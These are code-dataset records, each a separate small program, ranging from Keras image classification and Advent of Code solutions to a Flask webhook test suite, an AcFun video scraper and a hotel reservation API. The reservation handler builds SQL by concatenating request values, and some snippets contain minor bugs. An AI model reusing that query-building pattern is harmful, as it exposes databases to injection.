+{"seq_id":"266261777","text":"\"\"\" Necessary functions for visualizing, eg. making gifs, plots, or saving\n    numpy volumes for plotly graph \n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\n\n### train model loop\ndef visualise_sample(x, y, pred, \n                     num_to_visualise,\n                     slice_writer, vol_writer, \n                     use_2d, epoch, multi_class, predict_slice, is_training):\n    img = get_mid_slice(x.values[0], y.values[0], pred.values[0], multi_class)\n    session_type = \"Train\" if is_training else \"Validation\"\n    with slice_writer.as_default():\n        tf.summary.image(f\"{session_type} - Slice\", img, step=epoch)\n    if epoch % visual_save_freq == 0:\n        if not predict_slice:\n            img = get_mid_vol(y.values[0], pred.values[0], multi_class, check_empty=True)\n            if img is None:\n                num_to_visualise += 1\n            else:\n                with vol_writer.as_default():\n                    tf.summary.image(f\"{session_type} - Volume\", img, step=epoch)\n    return num_to_visualise\n\n\n## VNet: vnet_train from og dev_rl\n\ndef plot_imgs(images_arr, img_plt_names, plt_supertitle, save_fig_name, color_map=\"gray\"):\n    \"\"\" Plot images via imshow with titles.\n        Input array images_arr shape determines subplots.\n        Input array of images should have a corresponding array or list of plot names. \"\"\"\n    rows = np.shape(images_arr)[0]\n    cols = np.shape(images_arr)[1]\n\n    f, axes = plt.subplots(rows, cols)\n\n    for i in range(rows):\n        for j in range(cols):\n            axes[i, j].imshow(images_arr[i,j], cmap=color_map)\n            axes[i, j].set_title(img_plt_names[i*cols+j])\n\n\n    for a in axes:\n        for ax in a:\n            ax.xaxis.set_visible(False)\n            ax.yaxis.set_visible(False)\n\n    f.tight_layout(rect=[0, 0.01, 1, 0.93])\n    f.suptitle(plt_supertitle)\n    plt.savefig(save_fig_name)\n    plt.close('all')\n\n\n\n\n","sub_path":"Segmentation/utils/visualise_utils.py","file_name":"visualise_utils.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"263398276","text":"import numpy as np\n\nD = np.matrix([[2, -1, 0, -1, 0, 0, 0, 0, 0], [-1, 3, -1, 0, -1, 0, 0, 0, 0], [0, -1, 2, 0, 0, -1, 0, 0, 0], [-1, 0, 0, 3, -1, 0, -1, 0, 0], [0, -1, 0, -1, 4, -1, 0, -1, 0], [0, 0, -1, 0, -1, 3, 0, 0, -1], [0, 0, 0, -1, 0, 0, 2, -1, 0], [0, 0, 0, 0, -1, 0, -1, 3, -1], [0, 0, 0, 0, 0, -1, 0, -1, 2]])\n\n\ndef get_log_patch(image, number):\n\tmax = image.shape[0] / 3\n\tif number >= max**2: raise ValueError(\"Patch number exceeded\")\n\t\n\trow = number / max\n\tcol = number % max\n\t\n\tselector = [(row*3 + col + i) for i in range(3)]\n\t\n\tselection = image[np.ix_([3*row + i for i in range(3)], [3*col + i for i in range(3)])].astype(\"float\")\n\tmax_selection = np.max(selection)\n\t\n\treturn (255.0 * np.log(selection + 1)) / np.log(max_selection + 1)\n\t\n\ndef d_norm_patch(patch):\n\tpatch -= patch.mean()\n\tresult = patch / (np.sqrt(np.dot(np.dot(patch, D), patch.T)) + 1)\n\treturn result\n\ndef normalize_patches(image):\n\ti = 0\n\tpatches = []\n\twhile True:\n\t\ttry:\n\t\t\tpatch = get_log_patch(image, i)\n\t\t\tpatches.append(d_norm_patch(patch.flatten()).reshape(3,3))\n\t\texcept ValueError:\n\t\t\tbreak\n\t\ti += 1\n\treturn patches\n\ndef concat_patches(image, patches):\n\tmax = image.shape[0] / 3\n\tresult = None\n\tfor i in range(max):\n\t\tnew_row = None\n\t\tfor j in range(max):\n\t\t\tnew_row = 
patches[i * max + j] if new_row is None else np.append(new_row, patches[i * max + j], 1)\n\t\tresult = new_row if result is None else np.append(result, new_row, 0)\n\treturn result\n\ndef D_normalization(image):\n\timage = image.astype(\"float\")\n\tfor i in range(3):\n\t\tsub = image[..., i]\n\t\tpatches = normalize_patches(sub)\n\t\timage[..., i] = concat_patches(image, patches)\n\treturn image\n","sub_path":"Procesamiento/d_norm.py","file_name":"d_norm.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"164388034","text":"import math\n\nclass Material:\n\n def __init__(self, s):\n self.amount = int(s.split(\" \")[0].strip())\n self.chem = s.split(\" \")[1].strip()\n\n def __add__(self, other):\n if(self.chem == other.chem):\n return Material(str(self.amount+other.amount)+\" \"+self.chem)\n return Material(str(self.amount)+\" \"+self.chem)\n\n def __sub__(self, other):\n if(self.chem == other.chem):\n return Material(str(self.amount-other.amount)+\" \"+self.chem)\n return Material(str(self.amount)+\" \"+self.chem)\n\n def __mul__(self, multi):\n return Material(str(self.amount*multi)+\" \"+self.chem)\n \n def __str__(self):\n return str(self.amount)+\" \"+self.chem\n\n def __repr__(self):\n return self.__str__()\n\n def __eq__(self, other):\n return self.chem == other.chem\n\n def __hash__(self):\n return sum ( ord(s) for s in self.chem)\n\ndef topologicalSort(formulas):\n sortedList = []\n def visit(n):\n if(n in sortedList):\n return\n if(n.chem==\"ORE\"):\n return\n\n for newNode in formulas[n]:\n visit(newNode)\n \n sortedList.append(n)\n\n l = list(filter(lambda a: a not in sortedList, formulas.keys() ))\n while(len(l) > 0):\n visit(l[0])\n l = list(filter(lambda a: a not in sortedList, formulas.keys() ))\n \n return sortedList\n \ndef combineMats(reqs):\n result = []\n #print(reqs, \"combined to\", end=\" \")\n while(len(reqs) > 0):\n newMat = reqs.pop()\n #print(\"got\",newMat)\n for m in reqs:\n newMat = newMat+m\n result.append(newMat)\n reqs = list(filter(lambda a: a != newMat, reqs))\n reqs = list(filter(lambda a: a.amount > 0, reqs))\n\n #print(result)\n return result\n\nformula = {}\nmats = []\n\nwith open(\"../../day14.txt\", \"r\") as f:\n lines = f.readlines()\n for r in lines:\n d = r.strip('\\n').split(\" => \")\n #print(d)\n formula[Material(d[1].strip())] = [Material(s.strip()) for s in d[0].split(\",\")]\n\nprint(formula)\nprint(\"----\")\n\nsortedList =topologicalSort(formula)\nprint(topologicalSort(formula))\n\ndef countOre(fuel):\n req = [Material(fuel)]\n ore = Material(\"0 ORE\")\n while(req):\n matList = []\n for m in sortedList[::-1]:\n for x in req:\n if(m.chem == x.chem): \n matList.append(x)\n req.pop(req.index(m))\n break\n req = matList\n #print(\"req\",req) \n\n nextMat = list(filter(lambda a:a.chem==req[0].chem, formula.keys()))[0]\n\n multiplier = math.ceil(req[0].amount / nextMat.amount)\n req.extend([a*multiplier for a in formula[req[0]]])\n\n req.pop(0)\n req = combineMats(req)\n #print(\"newReq\",req) \n for o in filter(lambda a: a.chem==\"ORE\", req):\n ore = ore + o\n req = list(filter(lambda a: a.chem!=\"ORE\", req))\n return ore\n\nprint(1000000000000- countOre(\"998536 FUEL\").amount)\n#for i in range(360664,460664): \n #o = countOre(str(i)+\" FUEL\")\n #if(o.amount > 1000000000000):\n # print(str(i-1)+\" 
FUEL\")\n#print(\"formula:\",formula)\n#print(\"reqs:\",req)\n#print(\"ore:\",ore)\n","sub_path":"code2019/py3/day14/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"132166301","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n# get file names in list\nfrom os import listdir\nfrom os.path import isfile, join\n\nmypath = './datasets/images/'\n\nfile_names = [f for f in listdir(mypath) if isfile(join(mypath, f))]\nprint(str(len(file_names)) + ' files are loaded.')\nprint(file_names)\n\n\n# # Splitting our loaded images into a training and test/validation dataset\n# - we also need to store their labels (i.e. y_train, y_test, etc)\n# - we resize our images to maintain a constant dimension of 150 x 150\n# - we're going to use 1000 images of dogs and 1000 images of cats as our training data\n# - For our test/validation dataset we're going to use 500 of each class\n# - Dogs will be labeled 1 and cats 0\n# - We store our new images in the following directories\n#     * /datasets/catsvsdogs/train/dogs\n#     * /datasets/catsvsdogs/train/cats\n#     * /datasets/catsvsdogs/validation/dogs\n#     * /datasets/catsvsdogs/validation/cats\n\n# In[2]:\n\n\nimport cv2\nimport numpy as np\nimport sys\nimport os\nimport shutil\n\n# Extract 1000 for our training data and 500 for our validation set\n# Takes about -20 seconds to run\ndog_count = 0 \ncat_count = 0\ntraining_size = 20\ntest_size = 5\ntraining_images = []\ntraining_labels = []\ntest_images = []\ntest_labels = []\nsize = 150\ndog_dir_train = './datasets/catsvsdogs/train/dogs/'\ncat_dir_train = './datasets/catsvsdogs/train/cats/'\ndog_dir_val = './datasets/catsvsdogs/validation/dogs/'\ncat_dir_val = './datasets/catsvsdogs/validation/cats/'\n\ndef make_dir(directory):\n    if os.path.exists(directory):\n        shutil.rmtree(directory)\n    os.makedirs(directory)\n    \nmake_dir(dog_dir_train)\nmake_dir(cat_dir_train)\nmake_dir(dog_dir_val)\nmake_dir(cat_dir_val)\n\ndef getZeros(number):\n    if (number > 10 and number < 100):\n        return \"0\"\n    if (number < 10):\n        return \"00\"\n    else:\n        return \"\"\n    \n\nfor i, file in enumerate (file_names):\n    \n    if file_names[i][0] == \"d\":\n        dog_count += 1\n        image = cv2.imread(mypath+file, cv2.IMREAD_UNCHANGED)\n        # interpolate: used when resizing. INTER_AREA is used when shrinking the image\n        image = cv2.resize(image, (size, size), interpolation = cv2.INTER_AREA) \n        if dog_count <= training_size:\n            training_images.append(image)\n            training_labels.append(1)\n            zeros = getZeros(dog_count)\n            cv2.imwrite(dog_dir_train + str(zeros) + str(dog_count) + \".jpg\", image)\n        if dog_count > training_size and dog_count <= training_size+test_size:\n            test_images.append(image)\n            test_labels.append(1)\n            zeros = getZeros(dog_count-1000)\n            cv2.imwrite(dog_dir_val + str(zeros) + str(dog_count-1000) + \".jpg\", image)\n    \n    \n    # **** possible problem location ******\n    \n    if file_names[i][0] == \"c\":\n        cat_count += 1\n        image = cv2.imread(mypath+file) \n        image = cv2.resize(image, (size, size), interpolation = cv2.INTER_AREA)\n        if cat_count <= training_size:\n            training_images.append(image)\n            training_labels.append(0)\n            zeros = getZeros(cat_count)\n            cv2.imwrite(cat_dir_train + str(zeros) + str(cat_count) + \".jpg\", image)\n        if cat_count > training_size and cat_count <= training_size+test_size:\n            test_images.append(image)\n            test_labels.append(0)\n            zeros = getZeros(cat_count-1000)\n            cv2.imwrite(cat_dir_val + str(zeros) + str(cat_count-1000) + \".jpg\", image)\n    \n    if dog_count == training_size+test_size and cat_count == training_size+test_size:\n        break\n    \nprint(\"Training and Test Data Extraction Complete\")\n\n\n# # Let's save our datasets to NPZ files\n\n# In[3]:\n\n\n# Using numpy's savez function to store our loaded data as NPZ files\nnp.savez('cats_vs_dogs_training_data.npz', np.array(training_images))\nnp.savez('cats_vs_dogs_training_labels.npz', np.array(training_labels))\nnp.savez('cats_vs_dogs_test_data.npz', np.array(test_images))\nnp.savez('cats_vs_dogs_test_labels.npz', np.array(test_labels))\n\n\n# In[4]:\n\n\n# Loader Function\nimport numpy as np\n\ndef load_data_training_and_test(datasetname):\n    \n    npzfile = np.load(datasetname + \"_training_data.npz\")\n    train = npzfile['arr_0']\n    \n    npzfile = np.load(datasetname + '_training_labels.npz')\n    train_labels = npzfile['arr_0']\n\n    npzfile = np.load(datasetname + \"_test_data.npz\")\n    test = npzfile['arr_0']\n    \n    npzfile = np.load(datasetname + \"_test_labels.npz\")\n    test_labels = npzfile['arr_0']\n    \n    return (train, train_labels), (test, test_labels)\n\n\n# # Let's view some of our loaded images\n\n# In[ ]:\n\n\nfor i in range(1,11):\n    random = np.random.randint(0, len(training_images))\n    print(random)\n    cv2.imshow(\"image_\"+str(i), training_images[random])\n    if training_labels[random] == 0:\n        print(str(i) + \" - Cat\")\n    else:\n        print(str(i) + \" - Dog\")\n    cv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n# # Let's get our data ready in the format expected by Keras\n# * We also stick to the previous naming convention\n\n# In[ ]:\n\n\n(x_train, y_train), (x_test, y_test) = load_data_training_and_test(\"cats_vs_dogs\")\n\n# Reshaping our label and data from (2000,) to (2000,1) and test data from (1000,) to (1000,1)\ny_train = y_train.reshape(y_train.shape[0], 1)\ny_test = y_test.reshape(y_test.shape[0], 1)\n\n# Change our image type to float32 data type\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\n\n# Normalize our data by changing the range from (0 to 255) to (0 to 1)\nx_train /= 255\nx_test /= 255\n\nprint(x_train.shape)\nprint(y_train.shape)\nprint(x_test.shape)\nprint(y_test.shape)\n\n\n# In[ ]:\n\n\nfrom __future__ import print_function\nimport keras\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, 
Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nimport os\n\nbatch_size = 5\nepochs = 25\n\nimg_rows = x_train[0].shape[0]\nimg_cols = x_train[1].shape[0]\ninput_shape = (img_rows, img_cols, 3)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\nmodel.add(Conv2D(32, (3,3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\nmodel.add(Conv2D(64, (3,3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1))\n# we're going to use the sigmoid instead of softmax since it is binary classification\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(loss = 'binary_crossentropy',\n optimizer = 'rmsprop',\n metrics=['accuracy'])\n\nprint(model.summary())\n\n\n# # Training our model\n\n# In[ ]:\n\n\nhistory = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_test, y_test),\n shuffle=True)\n\nmodel.save(\"/Users/jisooyu/Dropbox/yu_project/udemy/master_computer_vision/Trained Models/cats_vs_dogs_V1.h5\")\n\n# Evaluate the performance of our trained model\nscores = model.evaluate(x_test, y_test, verbose=1)\nprint('Test loss:', scores[0])\nprint('Test accuracy:', scores[1])\n\n\n# # Testing our Classifier\n\n# In[ ]:\n\n\nimport cv2\nimport numpy as np\nfrom keras.models import load_model\n\nclassifier = load_model('/Users/jisooyu/Dropbox/yu_project/udemy/master_computer_vision/Trained Models/cats_vs_dogs_V1.h5')\n\ndef draw_test(name, pred, input_im):\n print('print pred ', pred)\n BLACK = [0,0,0]\n if pred == \"[0]\":\n pred = \"cat\"\n if pred == \"[1]\":\n pred = \"dog\"\n expanded_image = cv2.copyMakeBorder(input_im, 0, 0, 0, imageL.shape[0], cv2.BORDER_CONSTANT, value=BLACK)\n cv2.putText(expanded_image, str(pred), (252, 70), cv2.FONT_HERSHEY_COMPLEX_SMALL,4, (0,255,0), 2)\n cv2.imshow(name, expanded_image)\n \nfor i in range(0,1):\n rand = np.random.randint(0, len(x_test))\n input_im = x_test[rand]\n\n imageL = cv2.resize(input_im, None, fx=2, fy=2, interpolation = cv2.INTER_CUBIC)\n cv2.imshow(\"Test Image\", imageL)\n\n input_im = input_im.reshape(1,150,150,3)\n\n # Get Prediction\n res = str(classifier.predict_classes(input_im, 1, verbose = 1)[0])\n \n draw_test(\"Prediction\", res, imageL)\n cv2.waitKey(0)\n \ncv2.destroyAllWindows()\n\n\n","sub_path":"106_master_computer_vision.py","file_name":"106_master_computer_vision.py","file_ext":"py","file_size_in_byte":8454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"462944127","text":"from tkinter import *\nfrom extras import Extras\nfrom tkinter import messagebox\n\n\nclass Level7:\n\n def __init__(self, master, canvas, hint_counter, surrend_counter, sound):\n self.master = master\n self.canvas = canvas\n self.canvas.rowconfigure(0, weight=1)\n self.canvas.rowconfigure(1, weight=1)\n self.canvas.columnconfigure(0, weight=1)\n self.hint_counter = hint_counter\n self.surrend_counter = surrend_counter\n self.le_snd = sound\n self.the_extras = Extras(self.master, self.canvas, 7, self.hint_counter, self.surrend_counter,\n 'Is it just numbers?', 'The answer is a number.', 'jgi9c', 1, 0, False,\n self.le_snd)\n Label(self.canvas, text='9 13 5 1 14 14 15 20 8 9 14 7',\n font='none 40 bold', bg='black', fg='white', justify='center').grid(row=0, column=0)\n self.entry = 
Entry(self.canvas, font='none 20', bg='white', justify='center')\n self.entry.grid(row=0, column=0, sticky=S)\n self.entry.focus_set()\n self.entry.bind('', lambda event: Level7.check_next(self))\n self.canvas.update()\n self.canvas.mainloop()\n\n def check_next(self):\n if self.entry.get().lower() == 'zero' or self.entry.get() == '0':\n children = self.canvas.grid_slaves()\n self.hint_counter, self.surrend_counter = self.the_extras.hint_surrend()\n for x in children[0:len(children) - 1]:\n x.destroy()\n from welldone import WellDone\n WellDone(self.master, self.canvas, 7, self.hint_counter, self.surrend_counter, self.le_snd)\n else:\n messagebox.showerror('Not Worthy', 'Please try again')\n self.entry.delete(0, 'end')\n\n","sub_path":"level7.py","file_name":"level7.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271634856","text":"import hmac\nimport json\nimport os\nfrom hashlib import sha1\nfrom unittest import mock, TestCase\n\nfrom flask.cli import load_dotenv\n\nfrom app import flask_app\n\n\nclass ChaBotTests(TestCase):\n def setUp(self):\n load_dotenv()\n self.SECRET = os.environ.get('SPECIAL_SECRET')\n self.client = flask_app.test_client()\n\n @staticmethod\n def build_payload(action):\n return {\n 'action': action\n }\n\n def mock_utils(self, payload, signature=None):\n body = bytearray(json.dumps(payload), 'utf-8')\n signature = signature or hmac.new(bytearray(self.SECRET, 'utf-8'), body, sha1).hexdigest()\n with mock.patch('app.utils.pr_opened') as mock_pr_opened:\n with mock.patch('app.utils.pr_closed') as mock_pr_closed:\n response = self.client.post('/pull_request', headers={'X-Hub-Signature': f'sha1={signature}'}, json=payload)\n return response, mock_pr_opened, mock_pr_closed\n\n def test_say_hello(self):\n resp = self.client.get('/')\n assert resp.status_code == 200\n assert resp.data == b\"Hi. I'm the ChaBot. 
I spin up compute workers for codalab PRs!\"\n\n def test_verifying_github_signature(self):\n payload = self.build_payload('opened')\n resp, mock_open, mock_close = self.mock_utils(payload, signature='asdfasdf')\n assert resp.status_code == 403\n assert not mock_open.called\n assert not mock_close.called\n\n def test_pr_opened(self):\n payload = self.build_payload('opened')\n resp, mock_open, mock_close = self.mock_utils(payload)\n assert resp.status_code == 200\n assert mock_open.called\n assert not mock_close.called\n\n def test_pr_reopened(self):\n payload = self.build_payload('reopened')\n resp, mock_open, mock_close = self.mock_utils(payload)\n assert resp.status_code == 200\n assert mock_open.called\n assert not mock_close.called\n\n def test_pr_closed(self):\n payload = self.build_payload('closed')\n resp, mock_open, mock_close = self.mock_utils(payload)\n assert resp.status_code == 200\n assert not mock_open.called\n assert mock_close.called\n\n def test_pr_merged(self):\n payload = self.build_payload('merged')\n resp, mock_open, mock_close = self.mock_utils(payload)\n assert resp.status_code == 200\n assert not mock_open.called\n assert mock_close.called\n\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457824993","text":"import re\n\nimport requests\n\n\ndef get(url: str) -> dict:\n \"\"\"\n title、videos\n \"\"\"\n data = {}\n headers = {\n \"user-agent\": \"Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25\"\n }\n info_url = \"https://m.acfun.cn/rest/mobile-direct/play/playInfo/singleQuality?videoId={}&resourceId={}&resourceType=2&mkey=AAHewK3eIAAyMjA5NTQ0MDACARAAMEP1uwPvjQhfQAAAAIAq7FtjRH%2Fn9rSMzs1AUNhmIS6eARtddADGgoGewjnABMg39tddqp9dTUq%2Ffd7MBisH5JpVc1bpf64a%2Bz3qrdI%3D\"\n\n # get videoId, resourceIds\n re_title = r'(.*?)'\n re_videoId = r'\"vid\":\"(\\d+)\",'\n re_resourceId = r'\"ac\":\"(\\d+)\",'\n\n try:\n rep_html = requests.get(url, headers=headers, timeout=10)\n\n title = re.findall(re_title, rep_html.text)[0]\n videoId = re.findall(re_videoId, rep_html.text)[0]\n resourceId = re.findall(re_resourceId, rep_html.text)[0]\n\n rep_info = requests.get(info_url.format(videoId, resourceId), headers=headers, timeout=10)\n\n video = rep_info.json()[\"playInfo\"][\"streams\"][0][\"playUrls\"][0]\n except (IndexError, TypeError):\n data[\"msg\"] = \"获取失败\"\n else:\n data[\"title\"] = title\n data[\"videos\"] = [video]\n\n return data\n\n\nif __name__ == \"__main__\":\n url = \"https://m.acfun.cn/v/?ac=14134176&part=2\"\n print(get(url))\n","sub_path":"extractor/acfun.py","file_name":"acfun.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"260123002","text":"from sqlwrapper import gensql,dbget\nimport json\ndef HOTEL_RES_POST_Insert_RoomRouting(request):\n d = request.json\n \n gensql('insert','reservation.res_room_routing',d)\n return(json.dumps({'Status': 'Success', 'StatusCode': '200','Return': 'Record Inserted Successfully','ReturnCode':'RIS'}, sort_keys=True, indent=4))\ndef Hotel_RES_Get_Select_QueryRoomRouting(request):\n d = request.json\n sql_value = json.loads(dbget(\"select * from reservation.res_room_routing \\\n where res_id = \"+str(d['res_id'])+\" and res_unique_id = \"+str(d['res_unique_id'])+\"\"))\n return(json.dumps({'Status': 
'Success', 'StatusCode': '200','ReturnValue':sql_value ,'ReturnCode':'RRTS'},indent=4))\n","sub_path":"HOTEL_RES_POST_Insert_RoomRouting.py","file_name":"HOTEL_RES_POST_Insert_RoomRouting.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"381825207","text":"from ds_add_mul import adder, multiplier\nfrom ds_algo_input import algo_input\nfrom ds_algorithm import algo\nfrom ds_output import out\n\ndef main_input():\n input_var = raw_input(\"Enter the variable names:\\t\")\n input_varnum = len(input_var.strip())\n total_size = 0\n size = []\n for i in xrange(input_varnum):\n size.append(input(\"Enter the size of \" + str(input_var[i])+\"\\t\\t\"))\n total_size += size[i]\n input_exp = raw_input(\"Enter the Boolean Expression:\\t\")\n\n exp_new = input_exp.split(\"+\")\n\n\n exp_mul = []\n for term in exp_new:\n term = term.strip()\n var = {}\n for i in term:\n var[i] = []\n for j in xrange(size[input_var.find(i)]):\n var[i].append(i+str(j))\n #print var\n\n t = var[term[0]]\n for i in term[1:]:\n t = multiplier(t,var[i])\n exp_mul.append(t)\n\n\n\n exp_final = exp_mul[0]\n for i in exp_mul[1:]:\n exp_final = adder(exp_final,i)\n #print exp_final\n\n var = []\n for i in range(len(input_var)):\n for j in range(size[i]):\n var.append(input_var[i]+str(j))\n\n algos_input = []\n for i in exp_final:\n e= algo_input(var,i)\n if e == ['x'* total_size]:\n e.append(i)\n algos_input.append(e)\n\n #print algos_input\n\n output_exp = []\n\n for i in range(len(algos_input)):\n if 'x'*total_size in algos_input[i]:\n output_exp.append(algos_input[i])\n #print i,algos_input[i]\n else:\n #print i,algo(algos_input[i])\n output_exp.append(algo(algos_input[i]))\n\n out(input_var,output_exp,size,total_size)\n\nmain_input()\n","sub_path":"ds_mainInput.py","file_name":"ds_mainInput.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"467630266","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 31 13:11:25 2017\n\n@author: haot\n\"\"\"\n\nimport pandas as pd\nfrom datetime import date, timedelta\n\n\n#https://s3.amazonaws.com/ampthink-msg/device-reports/device-report-2017-09-08.csv\ndf=pd.DataFrame()\nyesterday = date.today() - timedelta(1)\nfor x in pd.date_range('09-08-2017', yesterday):\n x=x.date()\n name='https://s3.amazonaws.com/ampthink-msg/device-reports/device-report-%s.csv'%x\n data=pd.read_csv(name)\n df=pd.concat([df,data]).drop_duplicates().reset_index(drop=True)\nsch=pd.read_csv('C:/Users/haot/schedule.csv')\ndf['Date']=pd.to_datetime(df['Date']).dt.date\nsch['tm_event_date']=pd.to_datetime(sch['tm_event_date']).dt.date\ndf2=pd.merge(df,sch,how='left',left_on='Date',right_on='tm_event_date')\nfinal=df2[['Email','Date','ads_source']]\nfinal.columns=['Email','Date','Team']\nfinal.to_csv('G:/Engagement Marketing/wifi_gate_emails.csv',index=False)","sub_path":"thao/wifi_knicks_rangers.py","file_name":"wifi_knicks_rangers.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534138804","text":"from django.forms import ModelForm, CheckboxInput\nfrom houserules.repositories.models import Repository\n\n\nclass RepositoryForm(ModelForm):\n class Meta:\n model = Repository\n fields = ['is_active']\n\n\nclass ReadOnlyRepositoryForm(ModelForm):\n class Meta(object):\n model = Repository\n fields = ['is_active']\n widgets = 
{\n 'is_active': CheckboxInput(\n attrs={'readonly': True, 'disabled': True}\n )\n }\n","sub_path":"houserules/repositories/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628498431","text":"# -*- coding: utf-8 -*-\n# Medijan je vrijednost koja statistički niz dijeli na dva jednaka dijela.\n# Kod negrupiranog niza medijan je vrijednost obilježja koja pripada članu koji se nalazi u sredini\n# U jednom dijelu niza nalaze se elementi koji imaju vrijednost numeričkog obilježja jednaku ili manju od medijana\n# U drugom dijelu niza nalaze se elementi koji imaju vrijednost numeričkog obilježja jednaku ili veću od medijana\n\ndef medijan(lista):\n sortirano = sorted(lista)\n index = (len(lista)-1)/2\n return sortirano[index]\n\nkilogrami = [79, 84, 109, 98, 97, 69, 98, 73, 56, 93, 68, 78, 84, 96, 119]\nmedijan(kilogrami)\n","sub_path":"Medijan.py","file_name":"Medijan.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590670209","text":"\r\nprint(\"Counting vocals and consonants\")\r\nvocals=[\"a\",\"e\",\"i\",\"o\",\"u\"]\r\n\r\nphrase=input(\"Write a phrase:\")\r\n\r\nvocals_a=0\r\nconsonants=0\r\n\r\nfor letra in phrase:\r\n if letra in vocals:\r\n vocals_a += 1\r\n else:\r\n consonants += 1\r\n\r\nprint(\"Vocals={}\".format(vocals_a))\r\nprint(\"Consonants={}\".format(consonants))\r\n\r\n\r\n","sub_path":"contador_vocales_consonantes.py","file_name":"contador_vocales_consonantes.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620314539","text":"\"\"\"\nt_n = n(n+1)/2, or n^2 + n - 2t_n = 0, so n = (-1 + sqrt(1 + 8t_n))/2.\nwe can check if t_n is a triangular number by checking if ^ is an integer.\n\"\"\"\n\nfrom math import sqrt\n\ndef val(word):\n return sum([ord(x)-64 for x in word]) #-64 because ord('A') = 65\n\ndef istriangleword(word):\n tot = val(word)\n if (sqrt(1+8*tot)-1)%2 == 0:\n return 1\n return 0\n\nif __name__==\"__main__\":\n f = open('words.txt','r')\n line = f.readline()\n f.close()\n\n words = [x[1:-1] for x in line.split(',')]\n tot = 0\n for word in words:\n if istriangleword(word):\n tot += 1\n\n print(tot) # answer is 162\n","sub_path":"solutions/0042/0042.py","file_name":"0042.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457959980","text":"# Feature Point matching \n# artifical target: Circles\n# no optical flow\n\nimport cv2\nimport numpy as np\nimport os\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model, datasets\n\n# path\nvideo_dir = './Data/'\nvideo_path = os.path.join(video_dir,'C0047.MP4')\n\n# The video feed is read in as a VideoCapture object\ncap = cv2.VideoCapture(video_path)\nscale_percent = 90 # percent of original size\n\n# ydisp_plot_imCrop = np.array([])\nydisp_global_plot = np.array([])\nii = 0\n\nwhile(cap.isOpened()):\n ii = ii + 1\n # ret = a boolean return value from getting the frame, frame = the current frame being projected in the video\n ret, frame = cap.read()\n\n if ret == True:\n if ii == 1:\n roi = cv2.selectROI(frame)\n print(\"The Coordinate of LeftTop Point (x0, y0) = \" + \"(\" + str(int(roi[0])) + \", \" + str(int(roi[1])) + \")\")\n print(\"The Coordinate of RightBottom 
